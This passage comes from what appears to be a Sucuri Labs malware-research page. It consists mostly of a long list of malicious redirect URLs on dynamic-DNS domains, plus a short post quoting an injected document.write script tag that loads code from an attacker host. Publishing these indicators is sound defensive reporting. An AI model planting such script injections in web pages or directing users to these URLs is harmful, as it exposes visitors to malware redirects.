onfszvzfgnh.findhere.org/?go=2 oooppoooopopoo.myfw.us/?go=2 orla8631.myvnc.com/?go=2 orpdvovqpya.kwik.to/?go=2 otsiwakbbic.lookin.at/?go=2 ovczsiob.ibiz.cc/d/404.php?go=1 pamajmc.ibiz.cc/d/404.php?go=1 pduullvgyq.usa.cc/d/404.php?go=1 petyxbyeff.findhere.org/?go=2 pfugkrt.sixth.biz/d/404.php?go=1 pggjwuefsz.tld.cc/d/404.php?go=1 phairthcph.igg.biz/d/404.php?go=1 pirdppqqgh.youdontcare.com/?go=1 piuyvdredh.myfw.us/?go=2 popohgjgfdsre.lowestprices.at/?go=2 pufvepwsih.mynumber.org/d/404.php?go=1 pvpafdf.wikaba.com/?go=1 pwfoqrywto.dns1.us/i/i.php?go=1 pzpmsuov.tld.cc/d/404.php?go=1 pzyvxip.organiccrap.com/?go=2 qanystvhc.ibiz.cc/d/404.php?go=1 qerhkbdimoitvd5t.lowestprices.at/?go=2 qhpqtctciu.serveuser.com/d/404.php?go=1 qivtnqqxjnp.myfw.us/?go=2 qjfngeyij.youdontcare.com/d/404.php?go=1 qjjcafhy.tld.cc/d/404.php?go=1 qmptsbnjd.ibiz.cc/d/404.php?go=1 qnanrttdbj.lookin.at/?go=2 qnpixhly.igg.biz/d/404.php?go=1 qqfwyig.tld.cc/d/404.php?go=1 qqhtedw.ddns.info/i/i.php?go=1 qvawkcfcf.ibiz.cc/d/404.php?go=1 qwerppitrty.findhere.org/?go=2 qyjkiuopo.myfw.us/?go=2 qyqjnvmau.dyndnst.info/?go=2 r6vgetyfvf.byinter.net/?go=2 rbiunhdfklgfkl.rr.nu/?go=2 rbytjetbyvert.myfw.us/?go=2 reererrerereeeeeeeeetttg.findhere.org/?go=2 rhtbjgw.ibiz.cc/?go=2 rhtxfccdij.usa.cc/?go=2 rjnotxs.igg.biz/d/404.php?go=1 rjytkixbfjxkk.myfw.us/?go=2 rkoidbyobh.ibiz.cc/d/404.php?go=1 rmszsbqanuitrnt5.findhere.org/?go=2 rntbrtbxfggby.lowestprices.at/?go=2 rozadyqa.ibiz.cc/?go=2 rpwrxclxj.ibiz.cc/d/404.php?go=1 rqerjgezr.igg.biz/?go=2 rsbtyhrstyybrrtb2.lowestprices.at/?go=2 rsetvonmph.ibiz.cc/d/404.php?go=1 rtiuofgjdjfhkfgg.myredirect.us/?go=2 rtnssb5av3ybz.findhere.org/?go=2 rtyyujymdsrr.findhere.org/?go=2 runiytdtb.findhere.org/?go=2 rxtnusrbsvaerby.lowestprices.at/?go=2 ryeyymburbyr.myredirect.us/?go=2 sadjgkhiudfhg.byinter.net/?go=2 sakuhnsdcfjh.byinter.net/?go=2 sawrtdlsf.ibiz.cc/d/404.php?go=1 sbrtyvabyrr.lookin.at/?go=2 sbrvtctaxert.byinter.net/?go=2 scecsdfxersrecsfd.kwik.to/?go=2 sdbwrrrim.etowns.org/?go=2 sdfghbhevbsc.byinter.net/?go=2 sdidiobnjfhfk.myredirect.us/?go=2 sduhfwbeh.byinter.net/?go=2 sdvarfvgd.findhere.org/?go=2 seoyaaoad.igg.biz/d/404.php?go=1 siyaxrba.igg.biz/d/404.php?go=1 skpyirkxx.dynamic-dns.net/d/404.php?go=1 snavraetyrstvervg.lowestprices.at/?go=2 soisuthjkxjcbn.myredirect.us/?go=2 srtbhvsrbshfxb.byinter.net/?go=2 svaverbxrrtyvt.rr.nu/?go=2 sxbnckviofg.rr.nu/?go=2 sycrfuynhijj.myfw.us/?go=2 szdzaidns.toh.info/?go=2 tbuyegf.igg.biz/d/404.php?go=1 tdyudtbdy.lowestprices.at/?go=2 tevjyfbtfyh.byinter.net/?go=2 tgrukjhggfdwe.lowestprices.at/?go=2 thodwcxg.ibiz.cc/d/404.php?go=1 tlegjzpo.usa.cc/d/404.php?go=1 trev8246.myftp.org/?go=2 trhhiuyu.myfw.us/?go=2 trhpxtwr.ibiz.cc/?go=2 trpvptu.xxuz.com/d/404.php?go=1 truygdfijhgjkd.myredirect.us/?go=2 trwrdaypds.igg.biz/?go=2 tuntrsbrtbtung.lowestprices.at/?go=2 twenbrmndfui.myredirect.us/?go=2 txmovebnx.tld.cc/d/404.php?go=1 tyapxh.ddns.us/d/404.php?go=1 tyehybtgdhgef.myfw.us/?go=2 tyuntuytmii.myfw.us/?go=2 ucvndsb.proxydns.com/d/404.php?go=1 udkuiurooa.igg.biz/d/404.php?go=1 ueixlydyprxg.byinter.net/?go=2 uhfcmgtlnbkm.byinter.net/?go=2 uhjqzvcjfmb.ontheweb.nu/?go=2 uimflmxbtr.lookin.at/?go=2 uirkxfpa.igg.biz/d/404.php?go=1 ulfbtsrbx.lookin.at/?go=2 uljyynp.igg.biz/d/404.php?go=1 uonjjmcw.ibiz.cc/d/404.php?go=1 upcihiteyf.usa.cc/?go=2 upsgollo.ibiz.cc/d/404.php?go=1 uqhnrrqrql.findhere.org/?go=2 usrvbzrbyeab.lowestprices.at/?go=2 utopgjmrao.kwik.to/?go=2 uuuiuiiuuiuuiiuuuu.myfw.us/?go=2 uuuyuyyyyuuyuu.myfw.us/?go=2 uwhnuls.sexxxy.biz/d/404.php?go=1 uxkrlnxrhn.ibiz.cc/d/404.php?go=1 uyguyfdyjcf.lowestprices.at/?go=2 uzzlkmftmi.igg.biz/d/404.php?go=1 varbasrtbat.lookin.at/?go=2 vdtgbrgdgxtrstgvffvf.kwik.to/?go=2 vgjyttswcvj.lowestprices.at/?go=2 vhanclmstq.ibiz.cc/d/404.php?go=1 vjdiorpyfkjgfd.rr.nu/?go=2 vjlnwoof.dhcp.biz/d/404.php?go=1 vkhtdup.usa.cc/d/404.php?go=1 vkmdkimrpfsq.lookin.at/?go=2 vkwliwg.ibiz.cc/d/404.php?go=1 vmpjbiek.igg.biz/?go=2 vnpddighhfhb.rr.nu/?go=2 vooshvwxov.usa.cc/?go=2 vplzqlevmo.igg.biz/?go=2 vpwmdyaayb.igg.biz/d/404.php?go=1 vrtvkrhlg.igg.biz/?go=2 vrzbfnbf.ibiz.cc/?go=2 vymsygn.ibiz.cc/d/404.php?go=1 vzdqgxkj.ftpserver.biz/d/404.php?go=1 weihofdjkndurr.myredirect.us/?go=2 weiulfe.3d-game.com/?go=2 weswznfdlw.2waky.com/d/404.php?go=1 wfyczxb.usa.cc/d/404.php?go=1 wgeraervar.myfw.us/?go=2 wgykabjnh.usa.cc/d/404.php?go=1 whhmmoj.tld.cc/d/404.php?go=1 wiscfggtu.findhere.org/?go=2 wkicfzk.ddns.name/d/404.php?go=1 wmqjrtzhvw.igg.biz/d/404.php?go=1 wmqspbvifaw.byinter.net/?go=2 wrcpvznhjw.igg.biz/?go=2 wrgvetyfcdvf.byinter.net/?go=2 wsesprk.igg.biz/d/404.php?go=1 wupmexgddr.ibiz.cc/d/404.php?go=1 wwwrhyrty3tg.myfw.us/?go=2 wyphlwynl.myfw.us/?go=2 xaetthkkm.rr.nu/?go=2 xakibl.dynamicdns.org.uk/d/404.php?go=1 xaweazv.dns04.com/?go=1 xbcqifsyyx.igg.biz/d/404.php?go=1 xbfgzhvdfggggfff.rr.nu/?go=2 xbyrtyjffn.byinter.net/?go=2 xdrbtxeryey.myfw.us/?go=2 xeyuzgha.igg.biz/d/404.php?go=1 xghvbmnbse.lowestprices.at/?go=2 xghxccvfghtygw82.kwik.to/?go=2 xgmdntbxntr.myfw.us/?go=2 xgnghacwvh.dns1.us/d/404.php?go=1 xnwdxqo.igg.biz/?go=2 xprbatoar.myfw.us/?go=2 xqzhtkda.ibiz.cc/d/404.php?go=1 xrtiddm.bigmoney.biz/?go=2 xvpocbfc.igg.biz/?go=2 xycujqm.ns02.biz/d/404.php?go=1 xytuxmftzbdrv.lookin.at/?go=2 ybdtyndbjtvftb.myfw.us/?go=2 ydfpcjcc.usa.cc/d/404.php?go=1 yenxcsdulxap.myfw.us/?go=2 ygpisqql.igg.biz/d/404.php?go=1 yiiyfdhouk.usa.cc/?go=2 ymenowmg.ibiz.cc/?go=2 ymtdimnbsa.rr.nu/?go=2 ynkahqdxu.kwik.to/?go=2 yrdvjt.fartit.com/d/404.php?go=1 ytimndkybbtt.lookin.at/?go=2 ytryrytrfghfhghthfgfg.findhere.org/?go=2 ytuyiyvtv.byinter.net/?go=2 ytvxszoxsh.mynumber.org/d/404.php?go=1 yunssbzdrvy.lowestprices.at/?go=2 yunyiryunrbe.myfw.us/?go=2 yvlegmruw.ibiz.cc/d/404.php?go=1 yvymolzcbi.lookin.at/?go=2 yxxpjvlq.igg.biz/d/404.php?go=1 yyntnjnxrt.igg.biz/d/404.php?go=1 zavydwnsi.igg.biz/d/404.php?go=1 zbanrdrhh.ibiz.cc/d/404.php?go=1 zdrynztums.findhere.org/?go=2 zdymydindbyu.byinter.net/?go=2 zdyskrsmo.faqserv.com/d/404.php?go=1 ze4tvzbterbny.myfw.us/?go=2 zerymrbrtyrjydn.myfw.us/?go=2 zfhbsvcererr.myredirect.us/?go=2 zfwfkxidn.ibiz.cc/?go=2 zgglfahozq.ibiz.cc/d/404.php?go=1 zguzmbzde.tld.cc/d/404.php?go=1 zhipmylfi.ibiz.cc/?go=2 zjcfzje.usa.cc/?go=2 zjdjtygx.usa.cc/d/404.php?go=1 zjogtwkkslo.myfw.us/?go=2 zknvjmzerm.igg.biz/?go=2 zlsngkwojh.ibiz.cc/d/404.php?go=1 zmarlpglt.ibiz.cc/?go=2 zrymznxbf.lookin.at/?go=2 zrywfrpeo.bounceme.net/i/i.php?go=1 zuxalwcg.tld.cc/d/404.php?go=1 zvcweflptt.ibiz.cc/d/404.php?go=1 zwebterbze.myfw.us/?go=2 zwmxyfnyvm.jetos.com/d/404.php?go=1 zxcjoitre43wi.lowestprices.at/?go=2 zytmnnfcfb.lookin.at/?go=2 zyuyknxu.ibiz.cc/d/404.php?go=1</code></pre> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 6, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1113 --> <article id="post-1114" class="post-1114 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://labs.sucuri.net/encoded-javascript/" class="read-more-overlayer"></a> <header class="entry-header"> <h2 class="entry-title"><a href="https://labs.sucuri.net/encoded-javascript/" rel="bookmark">Encoded javascript</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Interesting redirection from lolotrololo.1dumb.com:</p> <pre><code>document.write(unescape("<script src = "http://lolotrololo.1dumb.com/n/40">..</code></pre> <p>Which redirects to <a href="http://indefw.bee.pl/info.php?n=40&p=n">http://indefw.bee.pl/info.php?n=40&p=n</a>.</p> </div><!-- .entry-content --> <!--<div class="read-more-link"> --> <!-- <a href="">Read More</a> --> <!-- </div> --> <div class="entry-meta"> <span class="posted-on">Jun 5, 2012</span> by <a href="https://labs.sucuri.net/author/daniel-cid/"><span class="byline">Daniel Cid</span><img alt='' src='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=42&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/df3ec5506ba59d2ed3b951b7057e97d0?s=84&d=mm&r=g 2x' class='avatar avatar-42 photo' height='42' width='42' loading='lazy' decoding='async'/></a> </div><!-- .entry-meta --> </article><!-- #post-1114 --> <nav class="navigation posts-navigation" aria-label="Posts"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://labs.sucuri.net/page/43/" >Older posts</a></div><div class="nav-next"><a href="https://labs.sucuri.net/page/41/" >Newer posts</a></div></div> </nav> </main><!-- #main --> </div><!-- #primary --> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215" id="sucurikb-navigation-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215" id="sucurikb-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1" id="foundation-js-js"></script> <script type="text/javascript" src="https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1" id="sucuri-wp-custom-js-js"></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>